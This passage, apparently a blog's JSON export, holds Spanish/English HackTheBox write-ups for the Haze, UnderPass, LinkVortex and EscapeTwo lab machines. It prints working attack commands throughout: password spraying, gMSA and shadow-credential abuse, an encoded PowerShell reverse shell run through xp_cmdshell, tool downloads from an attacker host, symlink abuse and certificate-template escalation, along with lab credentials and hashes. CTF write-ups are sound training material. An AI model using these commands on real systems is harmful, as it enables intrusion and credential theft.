alexander.green Haze-IT-Backup$ ``` ## Password Spraying Posiblemente haya algun usuario que recicle contraseñas y esto a veces se suele dar que 2 o mas usuarios usen una misma contraseña. ```zsh netexec smb 10.10.11.61 -u users -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success ``` ![Image](image-16.png) Podemos probar listar si hay mas usuarios con el usuario mark.adams ```zsh rpcclient -U 'mark.adams%Ld@p_Auth_Sp1unk@2k24' 10.10.11.61 -c 'querydispinfo' ``` ![Image](image-17.png) ## BloodHound ```zsh bloodhound-python -d haze.htb -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 -ns 10.10.11.61 --zip -c All ``` ![Image](image-18.png) Una **Cuenta de Servicio Administrada (sMSA)** independiente es una cuenta de dominio administrada que ofrece administración automática de contraseñas, administración simplificada del nombre principal de servicio (SPN) y la posibilidad de delegar la administración a otros administradores. - Lectura directa de la contraseña de la gMSA: La contraseña de la gMSA se almacena en el atributo msDS-ManagedPassword de Active Directory, al que solo pueden acceder las cuentas autorizadas (como los miembros del grupo de administradores de la gMSA). Como miembro del grupo de administradores, puede recuperar y descifrar directamente el atributo para obtener la contraseña en texto plano. Esto le permite iniciar sesión o realizar operaciones como la gMSA, lo que podría permitirle obtener mayores privilegios del sistema. - Ataque de retransmisión NTLM: Al explotar la vulnerabilidad del protocolo NTLM, un atacante puede retransmitir las solicitudes de autenticación NTLM al servicio LDAP o LDAPS y, a continuación, acceder al atributo msDS-ManagedPassword para obtener la contraseña de la gMSA. Sin embargo, este método requiere condiciones y configuraciones de red específicas, y la tasa de éxito es limitada. Ataque de gMSA dorada: Si un atacante tiene acceso al atributo de clave raíz del Servicio de Distribución de Claves (KDS), puede generar las contraseñas de todas las gMSA asociadas sin conexión. Esto se denomina ataque de \"gMSA dorada\" y permite al atacante obtener continuamente las contraseñas de las gMSA sin activar cambios de contraseña ni registros de acceso. [dacl - readgmsapassword](https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword) ```zsh netexec winrm haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' ``` ![Image](image-19.png) ```zsh python3 -u mark.adams -p Ld@p_Auth_Sp1unk@2k24 -d haze.htb ``` #### gMSADumper ![Image](image-20.png) ```zsh bloodyAD --host 10.10.11.61 -d haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' get object Haze-IT-Backup$ --attr msDS-ManagedPassword ``` ![Image](image-21.png) ```zsh Get-ADServiceAccount -Identity Haze-IT-Backup$ | Select-Object Name, ObjectClass ``` ![Image](image-22.png) ```powershell Get-ADServiceAccount -Identity \"Haze-IT-Backup$\" -Properties PrincipalsAllowedToRetrieveManagedPassword ``` ![Image](image-23.png) `Domain Admins` tiene permisos **PrincipalsAllowedToRetrieveManagedPassword** ### Impersonation trought PrincipalsAllowedToRetrieveManagedPassword Establecer la propiedad como Mark Adams ```powershell Set-ADServiceAccount -Identity \"Haze-IT-Backup$\" -PrincipalsAllowedToRetrieveManagedPassword \"mark.adams\" ``` Y ejecutamos nuevamente el script gMSADump.py ![Image](image-24.png) ```powershell Haze-IT-Backup$:::84d6a733d85d9e03f46eba25b34517a9 Haze-IT-Backup$:aes256-cts-hmac-sha1-96:8c47d46d7f2a5aef9d2ab5fda8c60b6e094ad78b2c55878faa9ff2b7fac740a6 Haze-IT-Backup$:aes128-cts-hmac-sha1-96:7627ff016dd47b73e99596362a068f41 ``` But can't coonect to 5985 ```powershell dsacls \"CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb\" ``` ![Image](image-25.png) **msDS-GroupMSAMembership** Este atributo se utiliza para realizar comprobaciones de acceso para determinar si un solicitante tiene permiso para recuperar la contraseña de un grupo MSA. [i](https://learn.microsoft.com/en-us/windows/win32/adschema/a-msds-groupmsamembership) ## BloodHound - 2 ```zsh bloodhound-python -d haze.htb -u 'Haze-IT-Backup$' --hashes ':84d6a733d85d9e03f46eba25b34517a9' -ns 10.10.11.61 --zip -c All ``` ![Image](image-26.png) Shadow Credentials ```zsh bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':84d6a733d85d9e03f46eba25b34517a9' set owner SUPPORT_SERVICES Haze-IT-Backup$ ``` ![Image](image-27.png) ```zsh impacket-dacledit -action write -rights FullControl -principal 'Haze-IT-Backup$' -target-dn 'CN=SUPPORT_SERVICES,CN=USERS,DC=haze,DC=htb' -dc-ip 10.10.11.61 \"haze.htb/Haze-IT-Backup$\" -hashes ':84d6a733d85d9e03f46eba25b34517a9' ``` ![Image](image-28.png) ```zsh bloodyAD --host \"10.10.11.61\" -d \"haze.htb\" -u \"Haze-IT-Backup$\" -p \":84d6a733d85d9e03f46eba25b34517a9\" add groupMember SUPPORT_SERVICES Haze-IT-Backup$ ``` ![Image](image-29.png) - Es necesario ejecutar los comandos rápidamente porque restablece las propiedades a los valores predeterminados. ![Image](image-30.png) #### Shadow Credential ```zsh /home/kali/Documents/HTB/haze/pywhisker.py -d haze.htb -u \"Haze-IT-Backup$\" -H '84d6a733d85d9e03f46eba25b34517a9' --target edward.martin --action add ``` ![Image](image-31.png) `sudo ntpadte 10.10.11.61` ```zsh python3 /home/kali/Documents/HTB/haze/PKINITtools/gettgtpkinit.py -cert-pfx 0XZLDVcs.pfx -pfx-pass YEOcmHvhgdp2PQl9UBzz haze.htb/edward.martin edward.ccache ``` ![Image](image-32.png) ```zsh export KRB5CCNAME=edward.ccache ``` ```zsh python3 /home/kali/Documents/HTB/certified/PKINITtools/getnthash.py -key 62672b5d1dd64d7e2cad72f1e50f283b58a6d1dab1a4e2ad4de37fffff4eff1e -dc-ip 10.10.11.61 haze.htb/edward.martin ``` ![Image](image-33.png) ## Privilege Escalation ![Image](image-34.png) ```zsh grep -r -i 'password =' . ``` ![Image](image-35.png) ```zsh grep -r -i '\\$1\\$' . ``` ![Image](image-36.png) Verificamos el archivo authentication.conf ![Image](image-37.png) [What-is-the-splunk-secret-file-and-is-it-possible-to-change-it](https://community.splunk.com/t5/Knowledge-Management/What-is-the-splunk-secret-file-and-is-it-possible-to-change-it/m-p/331207) ``$SPLUNK_HOME/etc/auth`` ![Image](image-38.png) ``` admin Sp1unkadmin@2k24 ``` ![Image](image-39.png) [reverse_shell_splunk](https://github.com/0xjpuff/reverse_shell_splunk) ![Image](image-40.png) `whoami /all` ![Image](image-41.png) [Abusing Tokens](https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.html?highlight=SeImpersonatePrivilege#seimpersonateprivilege) [GodPotato Binary](https://github.com/BeichenDream/GodPotato/releases) `iwr http://10.10.14.30/GodPotato-NET4.exe -o GodPotato-NET4.exe` ```powershell ./GodPotato-NET4.exe -cmd 'cmd /c whoami' ``` ![Image](image-42.png) Podemos cargar un shell.exe con msfvenom y ejecutarlo con msconsole ```powershell ./GodPotato-NET4.exe -cmd 'cmd /c C:\\temp\\shell.exe' ```"},{"id":"underpass","title":"HTB - UnderPass","description":"HTB - UnderPass","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox","docker","mosh","daloradius","container","UDP"],"authors":[],"url":"/blog/underpass","content":"## Box Info | Name | UnderPass | | :-------------------- | ---------------: | | Release Date | 21 Dec, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Recon ``` sudo nmap -p- --open --min-rate 5000 -sS -n -vvv -Pn 10.10.11.48 -oG allPorts nmap -sCV -p 22,80 10.10.11.48 -oN targeted ``` ### UDP Scan ```bash nmap -sU -T5 -n -v 10.10.11.48 -oG udpPorts ``` ![Image](image.png) ```bash nmap -p161 -sU -sCV -T5 -n -v 10.10.11.48 ``` ![Image](image-1.png) ```bash snmpwalk -v2c -c public 10.10.11.48 1 ``` ![Image](image-2.png) ![Image](image-3.png) ```bash dirsearch -u http://10.10.11.48/daloradius/ ``` ![Image](image-4.png) ![Image](image-5.png) dirsearch ```bash [22:21:36] 200 - 221B - /daloradius/.gitignore [22:22:26] 301 - 319B - /daloradius/app -> http://10.10.11.48/daloradius/app/ [22:22:45] 200 - 24KB - /daloradius/ChangeLog [22:23:05] 301 - 319B - /daloradius/doc -> http://10.10.11.48/daloradius/doc/ [22:23:06] 200 - 2KB - /daloradius/Dockerfile [22:23:06] 200 - 2KB - /daloradius/docker-compose.yml [22:23:42] 200 - 18KB - /daloradius/LICENSE [22:23:42] 301 - 323B - /daloradius/library -> http://10.10.11.48/daloradius/library/ [22:24:28] 200 - 10KB - /daloradius/README.md [22:24:40] 301 - 321B - /daloradius/setup -> http://10.10.11.48/daloradius/setup/ ``` File: docker-compose.yml ![Image](image-6.png) ```ruby version: \"3\" services: radius-mysql: image: mariadb:10 container_name: radius-mysql restart: unless-stopped environment: - MYSQL_DATABASE=radius - MYSQL_USER=radius - MYSQL_PASSWORD=radiusdbpw - MYSQL_ROOT_PASSWORD=radiusrootdbpw volumes: - \"./data/mysql:/var/lib/mysql\" radius: container_name: radius build: context: . dockerfile: Dockerfile-freeradius restart: unless-stopped depends_on: - radius-mysql ports: - '1812:1812/udp' - '1813:1813/udp' environment: - MYSQL_HOST=radius-mysql - MYSQL_PORT=3306 - MYSQL_DATABASE=radius - MYSQL_USER=radius - MYSQL_PASSWORD=radiusdbpw # Optional settings - DEFAULT_CLIENT_SECRET=testing123 volumes: - ./data/freeradius:/data # If you want to disable debug output, remove the command parameter command: -X radius-web: build: . container_name: radius-web restart: unless-stopped depends_on: - radius - radius-mysql ports: - '80:80' - '8000:8000' environment: - MYSQL_HOST=radius-mysql - MYSQL_PORT=3306 - MYSQL_DATABASE=radius - MYSQL_USER=radius - MYSQL_PASSWORD=radiusdbpw # Optional Settings: - DEFAULT_CLIENT_SECRET=testing123 - DEFAULT_FREERADIUS_SERVER=radius - MAIL_SMTPADDR=127.0.0.1 - MAIL_PORT=25 - MAIL_FROM=root@daloradius.xdsl.by - MAIL_AUTH= volumes: - ./data/daloradius:/data ``` Tenemos el puerto UDP 1812 ![Image](image-7.png) ![Image](image-8.png) ```bash dirsearch -u \"http://10.10.11.48/daloradius/app/\" ``` ```ruby Target: http://10.10.11.48/ [12:24:00] Starting: daloradius/app/ [12:25:43] 301 - 326B - /daloradius/app/common -> http://10.10.11.48/daloradius/app/common/ [12:28:54] 301 - 325B - /daloradius/app/users -> http://10.10.11.48/daloradius/app/users/ [12:28:54] 302 - 0B - /daloradius/app/users/ -> home-main.php [12:28:54] 200 - 2KB - /daloradius/app/users/login.php Task Completed ``` Directory \"Operators\" ```ruby dirsearch -u \"http://10.10.11.48/daloradius/app/\" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 ``` ![Image](image-9.png) - Primera web ![Image](image-10.png) - Segunda web ![Image](image-11.png) Ejecutamos un escaneo de directorios. ![Image](image-12.png) ![Image](image-13.png) ![Image](image-14.png) Encontramos un login en la segunda pagina web ![Image](image-15.png) Usuario ![Image](image-16.png) ![Image](image-17.png) Logeamos con las credenciales obtenidas en ssh `svcMosh` `underwaterfriends` ![Image](image-18.png) ### Privilege Escalation `sudo -l` ![Image](image-19.png) ![Image](image-20.png) ``mosh -h`` para ver que opciones tenemos para escalar privilegios ![Image](image-21.png) ```bash mosh --server=\"sudo /usr/bin/mosh-server\" localhost ``` ![Image](image-22.png)"},{"id":"linkvortex","title":"HTB - LinkVortex","description":"HTB - LinkVortex","date":"2025-02-02T00:00:00.000Z","tags":["HackTheBox"],"authors":["r4cc0x"],"url":"/blog/linkvortex","content":"## Box Info | Name | LinkVortex | | :-------------------- | ---------------: | | Release Date | 7 Dic, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-23 22:03 EST Nmap scan report for 10.10.11.47 (10.10.11.47) Host is up (0.058s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA) |_ 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519) 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Did not follow redirect to http://linkvortex.htb/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.28 seconds ``` Add domain to /etc/hosts ``` echo \"10.10.11.47 linkvortex.htb\" | sudo tee -a /etc/hosts 10.10.11.47 linkvortex.htb ``` https://medium.com/@zn9988/cve-2021-3271-ghost-cms-4-0-0-d174162482a4 `http://linkvortex.htb/ghost/#/signin` ![Image](image.png) ### SubDomain Scan ```bash wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302,301 -H \"Host: FUZZ.linkvortex.htb\" -u http://linkvortex.htb -t 100 ``` ![Image](image-1.png) Version from ghost and repository ![Image](image-2.png) We have a multiple files in .git path, we need to extract all those files with git-dumper tool. ```bash dirsearch -u http://dev.linkvortex.htb/ ``` ![Image](image-3.png) ```bash ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -u 'http://dev.linkvortex.htb/FUZZ' -fc 403 ``` ![Image](image-4.png) ![Image](image-5.png) https://github.com/arthaud/git-dumper ![Image](image-6.png) commands we can run on the directory ```bash git show ``` ```bash git log ``` config files ![Image](image-7.png) \"filename\": \"/tmp/ghost-test.db\" ![Image](image-8.png) ![Image](image-9.png) https://stackoverflow.com/questions/273743/using-wget-to-recursively-fetch-a-directory-with-arbitrary-files-in-it ```bash wget -r -np -R \"index.html*\" -e robots=off http://www.example.com/ ``` ```bash git restore . ``` we gonna use this commit id for see what restore ![Image](image-10.png) ```bash git diff 299cdb4387763f850887275a716153e84793077d ``` ![Image](image-11.png) ```bash const email = 'test@example.com'; - const password = 'thisissupersafe'; + const password = 'OctopiFociPilfer45'; ``` `email:` admin@linkvortex.htb `password:` OctopiFociPilfer45 ![Image](image-12.png) Once log in as admin, now can see the directories that before i cant see ![Image](image-13.png) `http://linkvortex.htb/ghost/api/canary/admin/session/` ![Image](image-14.png) ### CVE-2023-40028 ```bash ./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb ``` (why no user \"admin\"?) ```bash curl -i -s -d username=\"admin\" -d password=\"OctopiFociPilfer45\" -H \"Origin: http://linkvortex.htb\" -H \"Accept-Version: V3.0\" http://linkvortex.htb/ghost/api/canary/admin/session/ ``` ![Image](image-15.png) `/etc/passwd` ![Image](image-16.png) ```bash root:x:0:0:root:/root:/bin/bash node:x:1000:1000::/home/node:/bin/bash ``` Send Email with cURL ```bash curl -i -s -d username=\"admin@linkvortex.htb\" -d password=\"OctopiFociPilfer45\" -H \"Origin: http://linkvortex.htb\" -H \"Accept-Version: V3.0\" http://linkvortex.htb/ghost/api/canary/admin/session/ ``` ![Image](image-17.png) ![Image](image-18.png) ![Image](image-19.png) ```json mail\": { \"transport\": \"SMTP\", \"options\": { \"service\": \"Google\", \"host\": \"linkvortex.htb\", \"port\": 587, \"auth\": { \"user\": \"bob@linkvortex.htb\", \"pass\": \"fibber-talented-worth\" } } } ``` log in with ssh ![Image](image-20.png) #### SymLink ![Image](image-21.png) we need to inspect the script ```bash #!/bin/bash QUAR_DIR=\"/var/quarantined\" if [ -z $CHECK_CONTENT ];then CHECK_CONTENT=false fi LINK=$1 if ! [[ \"$LINK\" =~ \\.png$ ]]; then /usr/bin/echo \"! First argument must be a png file !\" exit 2 fi if /usr/bin/sudo /usr/bin/test -L $LINK;then LINK_NAME=$(/usr/bin/basename $LINK) LINK_TARGET=$(/usr/bin/readlink $LINK) if /usr/bin/echo \"$LINK_TARGET\" | /usr/bin/grep -Eq '(etc|root)';then /usr/bin/echo \"! Trying to read critical files, removing link [ $LINK ] !\" /usr/bin/unlink $LINK else /usr/bin/echo \"Link found [ $LINK ] , moving it to quarantine\" /usr/bin/mv $LINK $QUAR_DIR/ if $CHECK_CONTENT;then /usr/bin/echo \"Content:\" /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null fi fi fi ``` `QUAR_DIR=\"/var/quarantined` Defines the path of the directory where symbolic links (symlinks) will be moved. `CHECK_CONTENT=false` If the environment variable `CHECK_CONTENT` is not defined or is empty, it is set to `false`. This variable controls whether the content of the file pointed to by the symbolic link should be displayed. If `CHECK_CONTENT` is `true`, the content of the file pointed to by the symbolic link is displayed. ```bash export CHECK_CONTENT=true ``` `if /usr/bin/echo \"$LINK_TARGET\" | /usr/bin/grep -Eq '(etc|root)'; then` If the link points to a critical destination (such as `etc` or `root` directories), it deletes it. Otherwise, it moves the link to a quarantine directory and, optionally, displays its content. ```bash ln -s /root/root.txt /home/bob/a.png ``` ```bash ln -s /home/bob/a.txt /home/bob/e.png ``` ```bash sudo -u root /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/e.png ``` ![Image](image-22.png) PWNED!"},{"id":"escapetwo","title":"HTB - EscapeTwo","description":"HTB - EscapeTwo","date":"2025-01-31T00:00:00.000Z","tags":["HackTheBox","smb","bruteforce","SQLi","xp_cmdshell","DACL","BloodHound","ownership","grant-rights","ESC4","kerberos","shadow-credentials","NTLM"],"authors":["r4cc0x"],"url":"/blog/escapetwo","content":"## Box Info | Name | EscapeTwo | | :-------------------- | ---------------: | | Release Date | 31 Jun, 2025 | | OS | Windows | | Rated Difficulty | Easy | Windows Machine ```java Nmap 7.95 scan initiated Tue Jan 28 23:36:39 2025 as: /usr/lib/nmap/nmap -sCV -p 53,88,135,139,389,445,464, 593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49667,49689,49690,49691,49696,49720,49797 -oN target ed 10.10.11.51 Nmap scan report for 10.10.11.51 (10.10.11.51) Host is up (0.058s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-29 05:36:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default -First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: , DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-01-29T05:38:19+00:00; 0s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default -First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: , DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 |_ssl-date: 2025-01-29T05:38:19+00:00; 0s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-01-29T03:27:52 |_Not valid after: 2055-01-29T03:27:52 | ms-sql-ntlm-info: | 10.10.11.51:1433: | Target_Name: SEQUEL | NetBIOS_Domain_Name: SEQUEL | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: DC01.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 | ms-sql-info: | 10.10.11.51:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 |_ssl-date: 2025-01-29T05:38:19+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.sequel.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:: , DNS:DC01.sequel.htb | Not valid before: 2024-06-08T17:35:00 |_Not valid after: 2025-06-08T17:35:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open unknown 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open unknown 49667/tcp filtered unknown 49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49690/tcp open msrpc Microsoft Windows RPC 49691/tcp open msrpc Microsoft Windows RPC 49696/tcp filtered unknown 49720/tcp filtered unknown 49797/tcp filtered unknown Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-01-29T05:37:40 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . ``` - Initial creds rose KxEPkKe6R8su ###### Port 445 - miscrosoft-ds (SMB) ![Image](image.png) ```bash smbclient -L \\\\10.10.11.51 -U rose ``` ![Image](image-1.png) ```bash smbclient //10.10.11.51/Accounting\\ Department -U rose ``` ![Image](image-2.png) Use get fort download the files xlsx can open xlsx with wps 360 ![Image](image-3.png) | First Name | Last Name | Email | Username | Password | | ---------- | --------- | ----------------- | -------- | ---------------- | | Angela | Martin | angela@sequel.htb | angela | 0fwz7Q4mSpurIt99 | | Oscar | Martinez | oscar@sequel.htb | oscar | 86LxLBMgEWaKUnBG | | Kevin | Malone | kevin@sequel.htb | kevin | Md9Wlq1E5bZnVDVo | | NULL | | sa@sequel.htb | sa | MSSQLP@ssw0rd! | ### SMB User Bruteforcing https://www.netexec.wiki/smb-protocol/enumeration/enumerate-users-by-bruteforcing-rid ```bash netexec smb 10.10.11.51 -u \"rose\" -p \"KxEPkKe6R8su\" --rid-brute | grep SidTypeUser ``` ![Image](image-4.png) `Users`: Administrator Guest krbtgt DC01$ michael ryan oscan sql_svc rose ca_svc (zsh) ```ruby python3 mssqlclient.py escapetwo.htb/sa:MSSQLP@ssw0rd\\!@10.10.11.51 ``` ![Image](image-5.png) `EXEC sp_configure 'xp_cmdshell', 1;` `reconfigure;` for *check* we can use this command: `EXEC sp_configure 'xp_cmdshell';` and run whoami `xp_cmdshell \"whoami\"` ![Image](image-6.png) https://github.com/Mayter/mssql-command-tool/releases/tag/mssql `EXEC sp_configure 'xp_cmdshell', 1;` `reconfigure;` ```ruby xp_cmdshell powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA3ADAAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA ``` ![Image](image-7.png) `C:\\SQL2019\\ExpressAdv_ENU\\sql-Configuration.INI` ![Image](image-8.png) Password: ```ruby WqSZAF6CysDQbGb3 ``` ```bash netexec smb 10.10.11.51 -u users.txt -p 'WqSZAF6CysDQbGb3' ``` ![Image](image-9.png) ```bash evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3' ``` ![Image](image-10.png) ### Privilege Escalation (AD) `ipconfig /all` ![Image](image-11.png) ##### BloodHound ```ruby bloodhound-python -u ryan -p \"WqSZAF6CysDQbGb3\" -d sequel.htb -ns 10.10.11.51 -c All ``` ![Image](image-12.png) ![Image](image-13.png) #### DACL Abuse https://www.thehacker.recipes/ad/movement/dacl/grant-ownership https://www.kali.org/tools/bloodyad/ **Modify the owner of an Active Directory (AD) object** ```bash bloodyAD --host '10.10.11.51' -d 'escapetwo.htb' -u 'ryan' -p 'WqSZAF6CysDQbGb3' set owner 'ca_svc' 'ryan' ``` ![Image](image-14.png) https://www.thehacker.recipes/ad/movement/dacl/grant-rights ```bash sudo python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/\"ryan\":\"WqSZAF6CysDQbGb3\" ``` ![Image](image-15.png) > This command attempts to modify the access permissions (DACL) on the object `ca_svc` in the domain `sequel.htb`. Specifically, it is granting the `FullControl` (full control) right to the user `ryan`. This means that, if the command is successful, the user `ryan` will have complete control over the `ca_svc` object, allowing them to perform any action on it, such as reading, modifying, or deleting it. #### ESC4 to ESC1 https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.html#vulnerable-certificate-template-access-control---esc4 ```bash sudo certipy-ad shadow auto -u 'ryan@sequel.htb' -p \"WqSZAF6CysDQbGb3\" -account 'ca_svc' -dc-ip '10.10.11.51' ``` fix the erro: `sudo ntpdate sequel.htb` ![Image](image-16.png) > Extraction or manipulation of certificates in the AD certificate store, possibly to obtain sensitive information or to perform actions related to certificate security. `[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce` https://hideandsec-sh.translate.goog/books/cheatsheets-82c/page/active-directory-certificate-services?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc https://github.com/r3motecontrol/Ghostpack-CompiledBinaries ```powershell Invoke-WebRequest -UsebasicParsing -Uri http://10.10.14.170/Certify.exe -OutFile Certify.exe ``` ```powershell ./Certify.exe find /domain.sequel.htb ``` ![Image](image-17.png) `Template Name : DunderMifflinAuthentication` `Full Control Principals : SEQUEL\\Cert Publishers S-1-5-21-548670397-972687484-3496335370-517` https://github.com/ly4k/Certipy > Este comando busca y enumera los certificados que están configurados en el dominio **sequel.htb**. La herramienta **Certify.exe** se conecta al controlador de dominio (DC) del dominio especificado y realiza las siguientes acciones: > > 1. **Enumera plantillas de certificados**: Busca las plantillas de certificados configuradas en la Autoridad de Certificación (CA) del dominio. > > 2. **Enumera certificados emitidos**: Lista los certificados que han sido emitidos por la CA. > > 3. **Verifica configuraciones inseguras**: Identifica configuraciones potencialmente inseguras en las plantillas de certificados, como permisos excesivos o configuraciones que podrían permitir el abuso de certificados. **Auth with Kerberos** ```bash KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -dc-ip 10.10.XX.XX -target dc01.sequel.htb ``` ![Image](image-18.png) > 1. **Autenticación Kerberos**: Utiliza el ticket de Kerberos almacenado en `ca_svc.ccache` para autenticarse en el dominio `sequel.htb`. Esto permite ejecutar el comando sin necesidad de proporcionar credenciales directamente. > > 2. **Interacción con la plantilla de certificados**: Se dirige a la plantilla de certificados llamada **DunderMifflinAuthentication** en el controlador de dominio `dc01.sequel.htb`. > > 3. **Obtención de información**: Dependiendo del uso de **Certipy**, este comando podría estar obteniendo información sobre la plantilla de certificados, como sus configuraciones, permisos o vulnerabilidades. **Authentication based on NTLM hashes.** ```bash sudo certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug ``` ![Image](image-19.png) > - **NTLM hash authentication**: It uses the provided NTLM hash 